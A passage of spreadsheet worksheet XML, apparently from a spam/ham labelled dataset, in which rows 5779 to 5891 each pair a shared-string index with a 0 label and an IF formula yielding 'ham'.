      <c r="A5779" t="s">
        <v>5077</v>
      </c>
      <c r="B5779">
        <v>0</v>
      </c>
      <c r="C5779" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5780" t="s">
        <v>5078</v>
      </c>
      <c r="B5780">
        <v>0</v>
      </c>
      <c r="C5780" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5781" t="s">
        <v>5079</v>
      </c>
      <c r="B5781">
        <v>0</v>
      </c>
      <c r="C5781" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5782" t="s">
        <v>5080</v>
      </c>
      <c r="B5782">
        <v>0</v>
      </c>
      <c r="C5782" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5783" t="s">
        <v>5081</v>
      </c>
      <c r="B5783">
        <v>0</v>
      </c>
      <c r="C5783" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5784" t="s">
        <v>5082</v>
      </c>
      <c r="B5784">
        <v>0</v>
      </c>
      <c r="C5784" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5785" t="s">
        <v>21</v>
      </c>
      <c r="B5785">
        <v>0</v>
      </c>
      <c r="C5785" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5786" t="s">
        <v>5083</v>
      </c>
      <c r="B5786">
        <v>0</v>
      </c>
      <c r="C5786" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5787" t="s">
        <v>5084</v>
      </c>
      <c r="B5787">
        <v>0</v>
      </c>
      <c r="C5787" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5788" t="s">
        <v>5085</v>
      </c>
      <c r="B5788">
        <v>0</v>
      </c>
      <c r="C5788" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5789" t="s">
        <v>5086</v>
      </c>
      <c r="B5789">
        <v>0</v>
      </c>
      <c r="C5789" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5790" t="s">
        <v>5087</v>
      </c>
      <c r="B5790">
        <v>0</v>
      </c>
      <c r="C5790" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5791" t="s">
        <v>5088</v>
      </c>
      <c r="B5791">
        <v>0</v>
      </c>
      <c r="C5791" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5792" t="s">
        <v>5089</v>
      </c>
      <c r="B5792">
        <v>0</v>
      </c>
      <c r="C5792" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5793" t="s">
        <v>5090</v>
      </c>
      <c r="B5793">
        <v>0</v>
      </c>
      <c r="C5793" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5794" t="s">
        <v>5091</v>
      </c>
      <c r="B5794">
        <v>0</v>
      </c>
      <c r="C5794" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5795" t="s">
        <v>5092</v>
      </c>
      <c r="B5795">
        <v>0</v>
      </c>
      <c r="C5795" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5796" t="s">
        <v>5093</v>
      </c>
      <c r="B5796">
        <v>0</v>
      </c>
      <c r="C5796" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5797" t="s">
        <v>5094</v>
      </c>
      <c r="B5797">
        <v>0</v>
      </c>
      <c r="C5797" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5798" t="s">
        <v>5095</v>
      </c>
      <c r="B5798">
        <v>0</v>
      </c>
      <c r="C5798" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5799" t="s">
        <v>5096</v>
      </c>
      <c r="B5799">
        <v>0</v>
      </c>
      <c r="C5799" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5800" t="s">
        <v>5097</v>
      </c>
      <c r="B5800">
        <v>0</v>
      </c>
      <c r="C5800" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5801" t="s">
        <v>5098</v>
      </c>
      <c r="B5801">
        <v>0</v>
      </c>
      <c r="C5801" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5802" t="s">
        <v>5099</v>
      </c>
      <c r="B5802">
        <v>0</v>
      </c>
      <c r="C5802" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5803" t="s">
        <v>5100</v>
      </c>
      <c r="B5803">
        <v>0</v>
      </c>
      <c r="C5803" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5804" t="s">
        <v>5101</v>
      </c>
      <c r="B5804">
        <v>0</v>
      </c>
      <c r="C5804" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5805" t="s">
        <v>21</v>
      </c>
      <c r="B5805">
        <v>0</v>
      </c>
      <c r="C5805" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5806" t="s">
        <v>5102</v>
      </c>
      <c r="B5806">
        <v>0</v>
      </c>
      <c r="C5806" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5807" t="s">
        <v>21</v>
      </c>
      <c r="B5807">
        <v>0</v>
      </c>
      <c r="C5807" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5808" t="s">
        <v>5103</v>
      </c>
      <c r="B5808">
        <v>0</v>
      </c>
      <c r="C5808" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5809" t="s">
        <v>5104</v>
      </c>
      <c r="B5809">
        <v>0</v>
      </c>
      <c r="C5809" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5810" t="s">
        <v>5105</v>
      </c>
      <c r="B5810">
        <v>0</v>
      </c>
      <c r="C5810" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5811" t="s">
        <v>5106</v>
      </c>
      <c r="B5811">
        <v>0</v>
      </c>
      <c r="C5811" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5812" t="s">
        <v>5107</v>
      </c>
      <c r="B5812">
        <v>0</v>
      </c>
      <c r="C5812" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5813" t="s">
        <v>5108</v>
      </c>
      <c r="B5813">
        <v>0</v>
      </c>
      <c r="C5813" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5814" t="s">
        <v>21</v>
      </c>
      <c r="B5814">
        <v>0</v>
      </c>
      <c r="C5814" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5815" t="s">
        <v>5109</v>
      </c>
      <c r="B5815">
        <v>0</v>
      </c>
      <c r="C5815" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5816" t="s">
        <v>5110</v>
      </c>
      <c r="B5816">
        <v>0</v>
      </c>
      <c r="C5816" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5817" t="s">
        <v>5111</v>
      </c>
      <c r="B5817">
        <v>0</v>
      </c>
      <c r="C5817" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5818" t="s">
        <v>21</v>
      </c>
      <c r="B5818">
        <v>0</v>
      </c>
      <c r="C5818" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5819" t="s">
        <v>5112</v>
      </c>
      <c r="B5819">
        <v>0</v>
      </c>
      <c r="C5819" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5820" t="s">
        <v>5113</v>
      </c>
      <c r="B5820">
        <v>0</v>
      </c>
      <c r="C5820" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5821" t="s">
        <v>5114</v>
      </c>
      <c r="B5821">
        <v>0</v>
      </c>
      <c r="C5821" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5822" t="s">
        <v>5115</v>
      </c>
      <c r="B5822">
        <v>0</v>
      </c>
      <c r="C5822" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5823" t="s">
        <v>5116</v>
      </c>
      <c r="B5823">
        <v>0</v>
      </c>
      <c r="C5823" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5824" t="s">
        <v>5117</v>
      </c>
      <c r="B5824">
        <v>0</v>
      </c>
      <c r="C5824" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5825" t="s">
        <v>5118</v>
      </c>
      <c r="B5825">
        <v>0</v>
      </c>
      <c r="C5825" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5826" t="s">
        <v>5119</v>
      </c>
      <c r="B5826">
        <v>0</v>
      </c>
      <c r="C5826" t="str">
        <f t="shared" ref="C5826:C5889" si="91">IF(B5826="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5827" t="s">
        <v>5120</v>
      </c>
      <c r="B5827">
        <v>0</v>
      </c>
      <c r="C5827" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5828" t="s">
        <v>5121</v>
      </c>
      <c r="B5828">
        <v>0</v>
      </c>
      <c r="C5828" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5829" t="s">
        <v>5122</v>
      </c>
      <c r="B5829">
        <v>0</v>
      </c>
      <c r="C5829" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5830" t="s">
        <v>21</v>
      </c>
      <c r="B5830">
        <v>0</v>
      </c>
      <c r="C5830" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5831" t="s">
        <v>5123</v>
      </c>
      <c r="B5831">
        <v>0</v>
      </c>
      <c r="C5831" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5832" t="s">
        <v>5124</v>
      </c>
      <c r="B5832">
        <v>0</v>
      </c>
      <c r="C5832" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5833" t="s">
        <v>5125</v>
      </c>
      <c r="B5833">
        <v>0</v>
      </c>
      <c r="C5833" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5834" t="s">
        <v>21</v>
      </c>
      <c r="B5834">
        <v>0</v>
      </c>
      <c r="C5834" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5835" t="s">
        <v>5126</v>
      </c>
      <c r="B5835">
        <v>0</v>
      </c>
      <c r="C5835" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5836" t="s">
        <v>21</v>
      </c>
      <c r="B5836">
        <v>0</v>
      </c>
      <c r="C5836" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5837" t="s">
        <v>5127</v>
      </c>
      <c r="B5837">
        <v>0</v>
      </c>
      <c r="C5837" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5838" t="s">
        <v>5128</v>
      </c>
      <c r="B5838">
        <v>0</v>
      </c>
      <c r="C5838" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5839" t="s">
        <v>5129</v>
      </c>
      <c r="B5839">
        <v>0</v>
      </c>
      <c r="C5839" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5840" t="s">
        <v>5130</v>
      </c>
      <c r="B5840">
        <v>0</v>
      </c>
      <c r="C5840" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5841" t="s">
        <v>5131</v>
      </c>
      <c r="B5841">
        <v>0</v>
      </c>
      <c r="C5841" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5842" t="s">
        <v>5132</v>
      </c>
      <c r="B5842">
        <v>0</v>
      </c>
      <c r="C5842" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5843" t="s">
        <v>5133</v>
      </c>
      <c r="B5843">
        <v>0</v>
      </c>
      <c r="C5843" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5844" t="s">
        <v>5134</v>
      </c>
      <c r="B5844">
        <v>0</v>
      </c>
      <c r="C5844" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5845" t="s">
        <v>5135</v>
      </c>
      <c r="B5845">
        <v>0</v>
      </c>
      <c r="C5845" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5846" t="s">
        <v>5136</v>
      </c>
      <c r="B5846">
        <v>0</v>
      </c>
      <c r="C5846" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5847" t="s">
        <v>5137</v>
      </c>
      <c r="B5847">
        <v>0</v>
      </c>
      <c r="C5847" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5848" t="s">
        <v>5138</v>
      </c>
      <c r="B5848">
        <v>0</v>
      </c>
      <c r="C5848" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5849" t="s">
        <v>5139</v>
      </c>
      <c r="B5849">
        <v>0</v>
      </c>
      <c r="C5849" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5850" t="s">
        <v>5140</v>
      </c>
      <c r="B5850">
        <v>0</v>
      </c>
      <c r="C5850" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5851" t="s">
        <v>5141</v>
      </c>
      <c r="B5851">
        <v>0</v>
      </c>
      <c r="C5851" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5852" t="s">
        <v>21</v>
      </c>
      <c r="B5852">
        <v>0</v>
      </c>
      <c r="C5852" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5853" t="s">
        <v>5142</v>
      </c>
      <c r="B5853">
        <v>0</v>
      </c>
      <c r="C5853" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5854" t="s">
        <v>5143</v>
      </c>
      <c r="B5854">
        <v>0</v>
      </c>
      <c r="C5854" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5855" t="s">
        <v>5144</v>
      </c>
      <c r="B5855">
        <v>0</v>
      </c>
      <c r="C5855" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5856" t="s">
        <v>5145</v>
      </c>
      <c r="B5856">
        <v>0</v>
      </c>
      <c r="C5856" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5857" t="s">
        <v>5146</v>
      </c>
      <c r="B5857">
        <v>0</v>
      </c>
      <c r="C5857" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5858" t="s">
        <v>5147</v>
      </c>
      <c r="B5858">
        <v>0</v>
      </c>
      <c r="C5858" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5859" t="s">
        <v>5148</v>
      </c>
      <c r="B5859">
        <v>0</v>
      </c>
      <c r="C5859" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5860" t="s">
        <v>21</v>
      </c>
      <c r="B5860">
        <v>0</v>
      </c>
      <c r="C5860" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5861" t="s">
        <v>21</v>
      </c>
      <c r="B5861">
        <v>0</v>
      </c>
      <c r="C5861" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5862" t="s">
        <v>5149</v>
      </c>
      <c r="B5862">
        <v>0</v>
      </c>
      <c r="C5862" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5863" t="s">
        <v>5150</v>
      </c>
      <c r="B5863">
        <v>0</v>
      </c>
      <c r="C5863" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5864" t="s">
        <v>5151</v>
      </c>
      <c r="B5864">
        <v>0</v>
      </c>
      <c r="C5864" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5865" t="s">
        <v>5152</v>
      </c>
      <c r="B5865">
        <v>0</v>
      </c>
      <c r="C5865" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5866" t="s">
        <v>5153</v>
      </c>
      <c r="B5866">
        <v>0</v>
      </c>
      <c r="C5866" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5867" t="s">
        <v>5154</v>
      </c>
      <c r="B5867">
        <v>0</v>
      </c>
      <c r="C5867" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5868" t="s">
        <v>5155</v>
      </c>
      <c r="B5868">
        <v>0</v>
      </c>
      <c r="C5868" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5869" t="s">
        <v>5156</v>
      </c>
      <c r="B5869">
        <v>0</v>
      </c>
      <c r="C5869" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5870" t="s">
        <v>5157</v>
      </c>
      <c r="B5870">
        <v>0</v>
      </c>
      <c r="C5870" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5871" t="s">
        <v>5158</v>
      </c>
      <c r="B5871">
        <v>0</v>
      </c>
      <c r="C5871" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5872" t="s">
        <v>5159</v>
      </c>
      <c r="B5872">
        <v>0</v>
      </c>
      <c r="C5872" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5873" t="s">
        <v>5160</v>
      </c>
      <c r="B5873">
        <v>0</v>
      </c>
      <c r="C5873" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5874" t="s">
        <v>5161</v>
      </c>
      <c r="B5874">
        <v>0</v>
      </c>
      <c r="C5874" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5875" t="s">
        <v>5162</v>
      </c>
      <c r="B5875">
        <v>0</v>
      </c>
      <c r="C5875" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5876" t="s">
        <v>5163</v>
      </c>
      <c r="B5876">
        <v>0</v>
      </c>
      <c r="C5876" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5877" t="s">
        <v>5164</v>
      </c>
      <c r="B5877">
        <v>0</v>
      </c>
      <c r="C5877" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5878" t="s">
        <v>5165</v>
      </c>
      <c r="B5878">
        <v>0</v>
      </c>
      <c r="C5878" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5879" t="s">
        <v>5166</v>
      </c>
      <c r="B5879">
        <v>0</v>
      </c>
      <c r="C5879" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5880" t="s">
        <v>5167</v>
      </c>
      <c r="B5880">
        <v>0</v>
      </c>
      <c r="C5880" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5881" t="s">
        <v>5168</v>
      </c>
      <c r="B5881">
        <v>0</v>
      </c>
      <c r="C5881" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5882" t="s">
        <v>5169</v>
      </c>
      <c r="B5882">
        <v>0</v>
      </c>
      <c r="C5882" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5883" t="s">
        <v>5170</v>
      </c>
      <c r="B5883">
        <v>0</v>
      </c>
      <c r="C5883" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5884" t="s">
        <v>5171</v>
      </c>
      <c r="B5884">
        <v>0</v>
      </c>
      <c r="C5884" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5885" t="s">
        <v>5172</v>
      </c>
      <c r="B5885">
        <v>0</v>
      </c>
      <c r="C5885" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5886" t="s">
        <v>5173</v>
      </c>
      <c r="B5886">
        <v>0</v>
      </c>
      <c r="C5886" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5887" t="s">
        <v>5174</v>
      </c>
      <c r="B5887">
        <v>0</v>
      </c>
      <c r="C5887" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5888" t="s">
        <v>5175</v>
      </c>
      <c r="B5888">
        <v>0</v>
      </c>
      <c r="C5888" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5889" t="s">
        <v>21</v>
      </c>
      <c r="B5889">
        <v>0</v>
      </c>
      <c r="C5889" t="str">
        <f t="shared" si="91"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5890" t="s">
        <v>5176</v>
      </c>
      <c r="B5890">
        <v>0</v>
      </c>
      <c r="C5890" t="str">
        <f t="shared" ref="C5890:C5953" si="92">IF(B5890="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5891" t="s">
        <v>5177</v>
      </c>
      <c r="B5891">
        <v>0</v>
      </c>
